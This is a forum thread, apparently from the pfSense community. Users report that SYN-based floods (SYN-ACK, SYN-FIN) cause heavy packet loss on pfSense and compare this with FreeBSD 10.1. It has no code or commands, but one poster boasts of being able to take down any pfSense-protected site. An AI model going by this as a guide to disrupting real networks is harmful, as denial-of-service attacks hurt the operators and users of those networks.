    It's no issue if you use Windows Firewall as the frontend, and the webserver itself can easily handle the traffic both regarding backlog and overall traffic and packets.

    It's pfSense related and takes it down instantly.


  • Banned

    @Supermule:

    It's pfSense related and takes it down instantly.

    So it does NOT happen on FreeBSD?


  • Banned

    I haven't tested it on FreeBSD.

    So I can't relate to that. You are more than welcome to provide me with a FreeBSD target on PM, so we can test.

    @doktornotor:

    @Supermule:

    It's pfSense related and takes it down instantly.

    So it does NOT happen on FreeBSD?



  • @doktornotor:

    @Supermule:

    It's pfSense related and takes it down instantly.

    So it does NOT happen on FreeBSD?

    I tried it on a clean FreeBSD 10.1

    • it was much better than pfSense, not saying that it was 100% up, it had some packet loss as well, but no more than pfSense, which instantly or mostly gets 90-100% packet loss.
      It was without any tuning as well on FreeBSD 10.1


  • "but no more than pfSense, which instantly or mostly gets 90-100% packet loss"

    So was it less or more? Same? How much less or more?



  • @kejianshi:

    "but no more than pfSense, which instantly or mostly gets 90-100% packet loss"

    So was it less or more? Same? How much less or more?

    It really depends on the attack method. SYN-ACK or SYN-FIN, packet size etc.

    But after over 100 tests I would still say pfSense could have done it better. It is not handling SYN requests correctly. I don't have the skills to fix it or go deeper into it.

    Result:

    FreeBSD 10.1 = every 7-8th ping = packet loss (avg packet loss 10-20%)
    pfSense = every 1-2nd ping packet loss (avg packet loss 80-90%)

    So there is a notable difference clearly. pfSense was running stateful. Stateless helped a little bit.


  • Banned

    Anybody with serious FreeBSD skills wanting to help us test this??

    Money could be involved :D



  • I wonder if getting someone from the FreeBSD forums may be useful at this point.


  • Banned

    We have had ZERO response from the pfSense guys. This is quite disturbing since we can take down any site protected by pfSense as it is.

    Right now it's better to run without pf at all and rely on Windows Firewall on VMs and let pf handle the routing. Only way to survive the attacks as it is.

    Thinking of getting my old ISA2006 online again to test and see how it behaves.


  • Banned

    A little more…

    http://youtu.be/boa7bbeKRG0

    Now we can limit the states that are created, but basic routing is not working....still.



  • youtu huh?